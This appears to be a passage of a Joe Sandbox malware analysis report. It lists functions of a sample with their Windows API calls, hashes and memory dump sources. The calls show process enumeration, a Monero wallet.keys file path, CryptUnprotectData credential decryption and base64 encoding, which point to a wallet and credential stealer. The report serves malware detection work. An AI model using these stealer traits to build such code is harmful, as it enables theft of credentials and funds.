                        • Instruction ID: 36a107f4a675c26d7bcdb9a6c3ea5eff5e76c0938b69bbb58d59ae9d3b56a0bc
                        • Opcode Fuzzy Hash: 45568d45ed564fd7c74f1ff25e5fcc04f0df532599e39b05c9d20e2f56f747d4
                        • Instruction Fuzzy Hash: E382E6F26086049FE304AE2DEC8567AFBE9EF94720F16893DE6C4C3344E63598458797
                        Function 00C58680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C605B7), ref: 00C586CA
                        • Process32First.KERNEL32(?,00000128), ref: 00C586DE
                        • Process32Next.KERNEL32(?,00000128), ref: 00C586F3
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • CloseHandle.KERNEL32(?), ref: 00C58761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 35613ba527fcdfa0dd49acfd75aedc093dd0674afefd318d89fe2cf6b0bdd13d
                        • Instruction ID: d3b531488b4ea67f366130334ac0524bf74f5810f6c173c24248c7eea1ffaa8f
                        • Opcode Fuzzy Hash: 35613ba527fcdfa0dd49acfd75aedc093dd0674afefd318d89fe2cf6b0bdd13d
                        • Instruction Fuzzy Hash: D4315E75901218ABDB24DF52CC45FEEB778EB48701F1042A9B90AB2190DB306A89CFA5
                        Function 00C58EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00C45184,40000001,00000000,00000000,?,00C45184), ref: 00C58EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 2ca4bca0b3286b07b103b337cbc068d154f7e84d95d9206341118e3c4449e911
                        • Instruction ID: 4f0f17512818b047c495fae92a68d46fc173f5a06b4d2b85894d7b408e088167
                        • Opcode Fuzzy Hash: 2ca4bca0b3286b07b103b337cbc068d154f7e84d95d9206341118e3c4449e911
                        • Instruction Fuzzy Hash: F9114C78200204BFDB00CFA5DC89FA733A9AF89305F109558FD199B250DB75ED89DB64
                        Function 00C49AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00C44EEE,00000000,?), ref: 00C49B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49B2A
                        • LocalFree.KERNEL32(?,?,?,?,00C44EEE,00000000,?), ref: 00C49B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: 38a720d7deed5777a47788ca835641f4ddccc3a3a810444d3325cdcc38440275
                        • Instruction ID: dcf60e7ee7dcfd4ff425225f23a2ad0521f04207ae719321da9add337882d7e1
                        • Opcode Fuzzy Hash: 38a720d7deed5777a47788ca835641f4ddccc3a3a810444d3325cdcc38440275
                        • Instruction Fuzzy Hash: 3911A4B4240208AFEB14CF64DC95FAA77B5FB89700F208059FA199B390C775AA01CB50
                        Function 00C57980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C60E00,00000000,?), ref: 00C579B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C579B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00C60E00,00000000,?), ref: 00C579C4
                        • wsprintfA.USER32 ref: 00C579F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: d7edbb9c3730afad7edfc1440e72ed3716e6a1cb951c36cc3e0d526576d6cf6d
                        • Instruction ID: 748bd47be77aa47e5e37a9707ebac04995bf7ea08fc5d58909948d7221f61452
                        • Opcode Fuzzy Hash: d7edbb9c3730afad7edfc1440e72ed3716e6a1cb951c36cc3e0d526576d6cf6d
                        • Instruction Fuzzy Hash: 8D112AB2904118ABDB14DFCADD45BBEB7F8FB4CB11F14421AF605A2280E3395944D7B5
                        Function 00C57A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008A01F8,00000000,?,00C60E10,00000000,?,00000000,00000000), ref: 00C57A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008A01F8,00000000,?,00C60E10,00000000,?,00000000,00000000,?), ref: 00C57A7D
                        • wsprintfA.USER32 ref: 00C57AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 4ac5e61c8fa6f331335f60bb933db92377a2e866fcb3baf2164a1e94319a5d5e
                        • Instruction ID: 9d5569b1aaf6c74c1f6d3997ad1577f3c722059baf26db2b6e7e214f0b9b5414
                        • Opcode Fuzzy Hash: 4ac5e61c8fa6f331335f60bb933db92377a2e866fcb3baf2164a1e94319a5d5e
                        • Instruction Fuzzy Hash: A81182B1945218DFEB208B55DC49F59B778F704711F1043A6E91AA32C0D7741A84CF51
                        Function 01012BE7 Relevance: 5.4, Strings: 3, Instructions: 1660COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 72_$:.~$ ?o
                        • API String ID: 0-513434595
                        • Opcode ID: b900dc054c837cb418e763aebecd7494a9f8781802ff27657921e19e07301293
                        • Instruction ID: 071b5bb4f66f7c1f550efa795f5327538d711b5d785fb551cd2c5fa984a55cf1
                        • Opcode Fuzzy Hash: b900dc054c837cb418e763aebecd7494a9f8781802ff27657921e19e07301293
                        • Instruction Fuzzy Hash: 3AB217F360C200AFE3086E2DEC8577ABBE5EFD4720F1A853DE6C587744EA3558058696
                        Function 00C53720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(00C5E118,00000000,00000001,00C5E108,00000000), ref: 00C53758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C537B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 643a11895f6a48d19ac574a780d00775889845d5765dbacfcc023f73cbc55299
                        • Instruction ID: d1293a44617ade847714dc64c3324ed7b2a552a948cdffe0c99b5ce2d1526e28
                        • Opcode Fuzzy Hash: 643a11895f6a48d19ac574a780d00775889845d5765dbacfcc023f73cbc55299
                        • Instruction Fuzzy Hash: 56410975A00A289FDB24DB58CC94B9BB7B4BB48702F4041D9E608E72D0E7716EC9CF50
                        Function 00C49B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C49B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C49BA3
                        • LocalFree.KERNEL32(?), ref: 00C49BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 5acfb958773f2c641c840113059165a752a17360dd937df822776a6e3feef1f5
                        • Instruction ID: acaf10388dda56190af7453c5adcea1d10b632891e65624825428bc0075b2290
                        • Opcode Fuzzy Hash: 5acfb958773f2c641c840113059165a752a17360dd937df822776a6e3feef1f5
                        • Instruction Fuzzy Hash: 8E11C9B8A00209EFDB04DF94D989AAEB7B5FF88300F1445A9E915A7350D774AE14CFA1
                        Function 01008C55 Relevance: 4.1, Strings: 2, Instructions: 1595COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: R89$q%y{
                        • API String ID: 0-252007074
                        • Opcode ID: 3817c0859691b447f4767926e6437fe81c89187a28c9333a4e92a913c2fe2b7d
                        • Instruction ID: fbbd31cf95c3bee22b67586fbe18a421812008f042a057abee829864bdeeec92
                        • Opcode Fuzzy Hash: 3817c0859691b447f4767926e6437fe81c89187a28c9333a4e92a913c2fe2b7d
                        • Instruction Fuzzy Hash: 91B219F3A0C2049FE304AE2DEC8567ABBE5EFD4320F16893DE6C5C7344EA3558058696
                        Function 00F17033 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7\~$=:w
                        • API String ID: 0-3789187258
                        • Opcode ID: 9b7dfd4de10312fa711557acc95b5e4413ba0c8623cc769e8ee77763fdc362b4
                        • Instruction ID: b6c1f31b10a3fabb0134777f766634b3497ea6b2dfb72124dc1257bdcddafe3a
                        • Opcode Fuzzy Hash: 9b7dfd4de10312fa711557acc95b5e4413ba0c8623cc769e8ee77763fdc362b4
                        • Instruction Fuzzy Hash: 0D51C3F2A0C6049FF701BE29DC85B6AB7D5EF94310F16893CE6C883344EA3558158787
                        Function 01011562 Relevance: 2.5, Strings: 1, Instructions: 1269COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: -?
                        • API String ID: 0-4226073365
                        • Opcode ID: a43d86d1fb8cedc131ed815fa803420f3074802f7b3e70a47caf2eff985819d1
                        • Instruction ID: 6e1a0681cf404b2edb9eafa0738505fd3288ac7187a02a6708462f902b0044b8
